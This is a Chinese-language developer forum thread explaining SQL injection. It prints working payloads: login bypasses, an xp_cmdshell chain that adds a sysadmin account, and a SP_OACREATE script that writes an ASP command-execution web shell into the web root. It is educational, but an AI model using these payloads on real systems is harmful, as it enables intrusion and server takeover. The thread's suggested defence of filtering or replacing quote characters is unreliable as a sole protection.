这个问题不错，本来也想专门看一下这些资料，不过最近没空，对自己的程序在安全性方面也做了很少，不过还是留意了一些，也没有专门去测试。

一般应该过滤一些字符，特别是象 & % or ' =等一些SQL中的符号，比如SQL验证中的语句
SELECT * FROM Member WHERE UserName = 'A1' AND[Password] = 'password'
如果输入名称为"P1' OR '1' = '1
Password为"000000' OR '1' = '1
则验证SQL为
SELECT * FROM Member WHERE UserName = 'P1' OR '1' = '1' AND[Password] = '000000' OR '1' = '1'
那么这个SQL永远是成立的，所以输入内容必须过滤一些字符。

行者能介绍一下吗，安全方面是专门一课题，希望能尽量多知道一些。

安全方面的东西太多了。。。。。

我也是刚刚涉足这个领域而已。。。。就我知道的稍微说说好了。。

举最简单 SQL 射入的例子。。。

引用:

---

SQLstr = "SELECT * FROM tblUser WHERE UserName='" & _
Request("UserName") & "' AND Password='" & Request("Pass") & "'"

---

这是一般的写法。。。

如果在表单的用户名域填入 ' or 1=1--

则 SQL 语句变成：

引用:

---

SELECT * FROM tblUser WHERE UserName='' or 1=1 --' AND assword='xxxxx'

---

AND 子句被表示为说明。。。就可以成功进入系统。。

既然有任意执行 SQL 语句的权限了。。一般人当然不肯就此罢休。。。

如果填入。。。

引用:

---

' ; EXEC MASTER..XP_CMDSHELL 'net user Hacker /add' EXEC MASTER..SP_GRANTLOGIN 'BYRON-XP\Hacker' EXEC MASTER..SP_ADDSRVROLEMEMBER 'BYRON-XP\Hacker','sysadmin'--

---

或者

引用:

---

DECLARE @fs int,@fi int
EXEC SP_OACREATE 'Scripting.FileSystemObject',@fs OUTPUT
EXEC SP_OAMETHOD @fs,'CreateTextFile',@fs OUTPUT,'C:\InetPub\WWWRoot\SQLInject\Shell.asp',1
EXEC SP_OAMETHOD @fs,'WriteLine',null,'<% Set objShell=Server.CreateObject("WScript.Shell") : objShell.Run Request("cmd") %>'

---

后果就会严重很多了。。。。

蓝鲸在上个帖子中说

引用:

---

晚上太忙了，空时一定好好看你的帖子。

---

我也是刚刚涉足安全领域呢。。。

如果有什么写的不对的地方还希望鲸兄指正。。。。

我在实际工作中还没遇到那么问题，只是将'替换掉。